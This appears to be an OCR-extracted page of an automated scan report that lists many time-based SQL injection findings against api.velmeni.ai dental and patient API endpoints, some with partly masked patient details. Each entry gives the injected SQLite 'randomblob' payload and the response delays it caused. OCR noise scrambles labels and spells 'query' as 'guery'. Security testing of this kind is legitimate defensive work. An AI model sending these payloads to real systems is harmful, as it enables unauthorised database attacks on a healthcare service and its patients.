https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

POST Method

case randomblob(100000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [845] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,998] milliseconds, when the original unmodified query with value [142]

took [257] milliseconds.

Other Info

URL

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [845] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,998] milliseconds, when the original unmodified query with value [142] took [257] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [900] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,351] milliseconds, when the original unmodified query with value [44] took

[779] milliseconds.

Other

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [900] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,351] milliseconds, when the original unmodified query with value [44] took [779] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [948] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [5,056] milliseconds, when the original unmodified query with value [100]

took [1,202] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

Info

Other Info

not null then 1 else 1 end], which caused the request to take [948] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [5.056] milliseconds, when the original unmodified query with value [100] took [1,202] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [969] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,035] milliseconds, when the original unmodified query with value [164] took [759] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [969] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,035] milliseconds, when the original unmodified query with value [164] took [759] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [995] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,917] milliseconds, when the original unmodified guery with value [78] took [1,249] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [995] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,917] milliseconds, when the original unmodified query with value [78] took

[1,249] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [997] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,547] milliseconds, when the original unmodified query with value [244] took [3,315] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [997] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,547] milliseconds, when the original unmodified query with value [244] took [3,315] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/skip

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [772] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,707] milliseconds, when the original unmodified query with value [Blurred Image] took [261] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [772] milliseconds, parameter

Other

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the Info

request to take [1,707] milliseconds, when the original unmodified guery with value [Blurred

Image] took [261] milliseconds.

URL https://api.velmeni.ai/api/role/create role

POST Method

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [777] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [805] milliseconds, when the original unmodified query with value [test] took

[267] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [777] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [805] milliseconds, when the original unmodified query with value [test] took

[267] milliseconds.

URL https://api.velmeni.ai/api/sikka/add_image

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,304] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,566] milliseconds, when the original unmodified query with

value [ZP2JaQxqEk7ybIV6MJwDpw==] took [1,554] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,304] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,566] milliseconds, when the original unmodified query with

value [ZP2JaQxgEk7ybIV6MJwDpw==] took [1,554] milliseconds.

URL https://api.velmeni.ai/api/sikka/add_image

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [825] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,489] milliseconds, when the original unmodified query with value

[X8hPDbJRA57dEO+XQjknfQ==] took [1,035] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [825] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,489] milliseconds, when the original unmodified query with value

[X8hPDbJRA57dEO+XQjknfQ==] took [1,035] milliseconds.

URL https://api.velmeni.ai/api/sikka/add image

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,396] milliseconds,

> parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,324] milliseconds, when the original unmodified query with

value [sdhbvbsdjsdbkjdsdkvdv] took [782] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,396] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,324] milliseconds, when the original unmodified query with

value [sdhbvbsdjsdbkjdsdkvdv] took [782] milliseconds.

URL https://api.velmeni.ai/api/sikka/add_image

Method **POST** Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [791] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [795] milliseconds, when the original unmodified query with value [None]

took [785] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [791] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [795] milliseconds, when the original unmodified query with value [None]

took [785] milliseconds.

URL https://api.velmeni.ai/api/sikka/appointment

POST

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [275] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,073] milliseconds, when the original unmodified query with value [2023-01-31] took

[1,252] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [275] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,073] milliseconds, when the original unmodified query with value [2023- 01-31] took [1,252] milliseconds.

https://api.velmeni.ai/api/sikka/create_patient_webhook

POST

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,246] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,269] milliseconds, when the original unmodified query with

value [] took [1,348] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,246] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,269] milliseconds, when the original unmodified query with

value [] took [1,348] milliseconds.

URL https://api.velmeni.ai/api/sikka/create patient webhook

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [953] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,456] milliseconds, when the original unmodified guery with value [08/15

/22-active rem2000ded50.K] took [714] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [953] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,456] milliseconds, when the original unmodified guery with value [08/15

/22-active rem2000ded50.K] took [714] milliseconds.

URL https://api.velmeni.ai/api/sikka/create patient webhook

POST Method

Attack

case randomblob(1000000) when not null then 1 else 1 end

Other

Evidence

Info

Method

Evidence

Other Info

URL

Method

Attack

Evidence

Other Info

Evidence

Other Info

Evidence	The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,450] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,563] milliseconds, when the original unmodified query with value [https://api.sikkasoft.com/v4/practices/1/appointments?patient_id=76****] took [1,255] milliseconds.
Other Info	The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,450] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,563] milliseconds, when the original unmodified query with value [https://api.sikkasoft.com/v4/practices/1/appointments?patient_id=76****] took [1,255] milliseconds.
URL	https://api.velmeni.ai/api/sikka/create_patient_webhook
Method	POST
Attack	case randomblob(100000) when not null then 1 else 1 end
Evidence	The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,081] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,925] milliseconds, when the original unmodified query with value [0-Non insurance patient] took [709] milliseconds.
Other Info	The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,081] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,925] milliseconds, when the original unmodified query with value [0-Non insurance patient] took [709] milliseconds.
URL	https://api.velmeni.ai/api/sikka/create_patient_webhook
Method	POST
Attack	case randomblob(100000) when not null then 1 else 1 end
Evidence	The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,218] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,242] milliseconds, when the original unmodified query with value [2006-09-09T00:00:00] took [701] milliseconds.
Other Info	The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,218] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,242] milliseconds, when the original unmodified query with value [2006-09-09T00:00:00] took [701] milliseconds.
URL	https://api.velmeni.ai/api/sikka/create patient webhook
Method	POST
Attack	case randomblob(1000000) when not null then 1 else 1 end
Evidence	The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,484] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,560] milliseconds, when the original unmodified query with value [India] took [1,467] milliseconds.
Other Info	The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,484] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,560] milliseconds, when the original unmodified query with value [India] took [1,467] milliseconds.
URL	https://api.velmeni.ai/api/sikka/create_patient_webhook
Method	POST
Attack	case randomblob(1000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,583] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,430] milliseconds, when the original unmodified guery with value [Los Gatos] took [1,527] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,583] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,430] milliseconds, when the original unmodified query with value [Los Gatos] took [1,527] milliseconds.

URL

https://api.velmeni.ai/api/sikka/create patient webhook

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,472] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,492] milliseconds, when the original unmodified query with value [2019-09-09T00:00:00] took [1,281] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,472] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,492] milliseconds, when the original unmodified guery with value [2019-09-09T00:00:00] took [1,281] milliseconds.

URL

https://api.velmeni.ai/api/sikka/create patient webhook

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,357] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,404] milliseconds, when the original unmodified query with value [****] took

[1,466] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,357] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,404] milliseconds, when the original unmodified query with value [****] took [1,466] milliseconds.

URL

https://api.velmeni.ai/api/sikka/create_patient_webhook

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [913] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,036] milliseconds, when the original unmodified query with value [workphone] took [1,481] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [913] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,036] milliseconds, when the original unmodified query with value [workphone] took [1,481] milliseconds.

URL

https://api.velmeni.ai/api/sikka/create_patient_webhook

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,006] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,127] milliseconds, when the original unmodified query with

value [alert note] took [1,312] milliseconds.

Other Info

URL

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,006] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,127] milliseconds, when the original unmodified query with value [alert note] took [1,312] milliseconds.

https://api.velmeni.ai/api/sikka/create_patient_webhook

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,582] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,431] milliseconds, when the original unmodified query with

value [Pallavi] took [1,961] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,582] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,431] milliseconds, when the original unmodified query with

https://api.velmeni.ai/api/sikka/create patient webhook

POST

Attack case randomblob(100000) when not null then 1 else 1 end

value [Pallavi] took [1,961] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,525] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,533] milliseconds, when the original unmodified query with value [] took

[1,269] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,525] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,533] milliseconds, when the original unmodified query with value [] took [1,269] milliseconds.

https://api.velmeni.ai/api/sikka/create patient webhook

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,407] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,536] milliseconds, when the original unmodified query with

value [] took [1,580] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,407] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,536] milliseconds, when the original unmodified query with

value [] took [1,580] milliseconds.

https://api.velmeni.ai/api/sikka/create_patient_webhook URL

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,452] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,750] milliseconds, when the original unmodified query with value [] took

[1,333] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not

Other Info

Evidence

URL

Method

Evidence

Other Info

URL

Evidence

Other

Info

Other Info

null then 1 else 1 end], which caused the request to take [1,452] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,750] milliseconds, when the original unmodified query with value [] took

[1,333] milliseconds.

URL

https://api.velmeni.ai/api/sikka/create patient webhook

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,209] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,242] milliseconds, when the original unmodified query with value [https://api.sikkasoft.com/v4/practices/1/patients/76****] took [1,214] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,209] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,242] milliseconds, when the original unmodified query with value [https://api.sikkasoft.com/v4/practices/1/patients/76****] took [1,214] milliseconds.

URL

https://api.velmeni.ai/api/sikka/create patient webhook

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,480] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,069] milliseconds, when the original unmodified query with value [] took

[1,324] milliseconds.

Other Info

URL

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,480] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,069] milliseconds, when the original unmodified query with value [] took [1,324] milliseconds.

https://api.velmeni.ai/api/sikka/create_patient_webhook

Method

POST case randomblob(100000) when not null then 1 else 1 end

Evidence

Attack

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,432] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,432] milliseconds, when the original unmodified query with value [419577

/419577//] took [689] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,432] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,432] milliseconds, when the original unmodified guery with value [419577 /419577//] took [689] milliseconds.

URL

https://api.velmeni.ai/api/sikka/create_patient_webhook

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,319] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,422] milliseconds, when the original unmodified query with value [Takur] took [1,478] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,319] milliseconds,

Other

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which Info

caused the request to take [1,422] milliseconds, when the original unmodified query with

value [Takur] took [1,478] milliseconds.

URL https://api.velmeni.ai/api/sikka/create patient webhook

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,159] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,970] milliseconds, when the original unmodified query with value [] took

[885] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,159] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,970] milliseconds, when the original unmodified query with value [] took

[885] milliseconds.

URL https://api.velmeni.ai/api/sikka/create_patient_webhook

POST

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,313] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

> caused the request to take [2,247] milliseconds, when the original unmodified query with

value [abcd alert note] took [2,011] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,313] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,247] milliseconds, when the original unmodified query with

value [abcd alert note] took [2,011] milliseconds.

URL https://api.velmeni.ai/api/sikka/create_patient_webhook

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,017] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,542] milliseconds, when the original unmodified query with value [https://api.sikkasoft.com/v4/practice_events?offset=1&limit=500] took [1,092] milliseconds.

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,017] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,542] milliseconds, when the original unmodified query with value [https://api.sikkasoft.com/v4/practice_events?offset=1&limit=500] took [1,092] milliseconds.

URL https://api.velmeni.ai/api/sikka/create patient webhook

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,194] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,623] milliseconds, when the original unmodified query with value [0] took

[946] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,194] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,623] milliseconds, when the original unmodified query with value [0] took [946] milliseconds.

https://api.velmeni.ai/api/sikka/create patient webhook **URL**

Method **POST**

Evidence

Other

Info

Method

Evidence

Other Info

Evidence

Other

Info

Evidence

Other Info

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,417] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,656] milliseconds, when the original unmodified query with value [] took

[755] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,417] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,656] milliseconds, when the original unmodified query with value [] took

[755] milliseconds.

URL https://api.velmeni.ai/api/sikka/create_patient_webhook

POST

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,334] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,712] milliseconds, when the original unmodified query with value [] took

[743] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,334] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,712] milliseconds, when the original unmodified query with value [] took

[743] milliseconds.

URL https://api.velmeni.ai/api/sikka/create_patient_webhook

POST

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,432] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,421] milliseconds, when the original unmodified query with value [] took

[1,452] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,432] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,421] milliseconds, when the original unmodified query with value [] took

[1,452] milliseconds.

URL https://api.velmeni.ai/api/sikka/create patient webhook

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,015] milliseconds,

> parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,472] milliseconds, when the original unmodified query with

value [] took [1,310] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,015] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,472] milliseconds, when the original unmodified query with

value [] took [1,310] milliseconds.

URL https://api.velmeni.ai/api/sikka/create patient webhook

POST Method

Attack

case randomblob(10000000) when not null then 1 else 1 end

Other Info

Evidence

Method

Evidence

Other Info

Method

Attack

Evidence

Other Info

Evidence

Other Info

Evidence

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [877] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,728] milliseconds, when the original unmodified query with value [08/15

/22-active rem2000ded50.K] took [1,483] milliseconds.

Other

Info

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [877] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,728] milliseconds, when the original unmodified query with value [08/15

/22-active rem2000ded50.K] took [1,483] milliseconds.

URL https://api.velmeni.ai/api/sikka/create_patient_webhook

POST

case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,393] milliseconds. parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,413] milliseconds, when the original unmodified guery with

value [1] took [1,563] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,393] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,413] milliseconds, when the original unmodified query with

value [1] took [1,563] milliseconds.

URL https://api.velmeni.ai/api/sikka/create patient webhook

Method **POST**

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,429] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,503] milliseconds, when the original unmodified query with value [] took

[1,356] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,429] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,503] milliseconds, when the original unmodified query with value [] took [1,356] milliseconds.

https://api.velmeni.ai/api/sikka/create patient webhook

POST

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [937] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,530] milliseconds, when the original unmodified query with value [https://api.sikkasoft.com/v4/practices/1/providers/1] took [736] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [937] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,530] milliseconds, when the original unmodified query with value [https://api.sikkasoft.com/v4/practices/1/providers/1] took [736] milliseconds.

URL https://api.velmeni.ai/api/sikka/create_patient_webhook

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,634] milliseconds,

Evidence

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,695] milliseconds, when the original unmodified query with value [22-49-76-AF-7C-FD-03] took [1,566] milliseconds.

Method

Attack

Evidence

Other

Info

Attack

Evidence

Other

Info

URL

Method

Evidence

Other Info

Attack

Other Info

